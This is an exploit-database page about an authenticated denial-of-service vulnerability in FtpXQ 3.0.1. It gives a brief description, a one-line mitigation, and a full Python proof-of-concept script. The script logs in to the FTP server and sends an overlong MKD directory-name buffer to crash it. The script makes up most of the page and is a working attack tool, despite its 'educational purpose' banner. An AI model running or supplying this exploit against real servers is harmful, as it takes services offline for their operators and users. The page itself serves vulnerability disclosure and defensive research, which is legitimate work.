header-logo
Suggest Exploit
vendor:
FtpXQ
by:
Marc Doudiet
7.5
CVSS
HIGH
Denial of Service
N/A
CWE
Product Name: FtpXQ
Affected Version From: 3.0.1
Affected Version To: 3.0.1
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP2
Unknown

FtpXQ authenticated remote Dos

FtpXQ authenticated remote Dos is a vulnerability found in FtpXQ version 3.0.1. It requires write access and is vulnerable to the MKD command. It was discovered by Marc Doudiet and a proof of concept code was released.

Mitigation:

Ensure that the FtpXQ version is up to date and that write access is restricted.
Source

Exploit-DB raw data:

#!/usr/bin/python

banner=(
"*************************\r\n"
"* Exploit Title: FtpXQ authenticated remote Dos "
"* (trial on http://www.datawizard.net/Products/FtpXQ/Setup.EXE) Version 3.0.1 \r\n"
"* Tested on XP sp2 english"
"* Needs write access --> vuln on MKD command\r\n"
"* Vulnerability found by Marc Doudiet\r\n"
"* For educational purpose only\r\n"
"* Proof of concept code\r\n")


import socket
import sys

def Usage():
    print ("Usage: ./ftpxq.py <Username> <password> <host>\n")

string="A"*400

def start(username, password, hostname):
    	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	print banner
    	try:
        	s.connect((hostname, 21))
		print "[-] Connecting to the FTP ..."
    	except:
        	print ("[-] Connection error!")
        	sys.exit(1)
	s.recv(1024)
	s.send('USER '+username+'\r\n')
	s.recv(1024)
	s.send('PASS '+password+'\r\n')
	s.recv(1024)
	print "[-] Sending evil buffer ...\r\n"
	s.send('MKD '+string+'\r\n')

if len(sys.argv) <> 4:
	Usage()
	sys.exit(1)
else:
	hostname=sys.argv[1]
	username=sys.argv[2]
	passwd=sys.argv[3]
	start(hostname,username,passwd)
	print "[-] Exploit seems to work"
	sys.exit(0)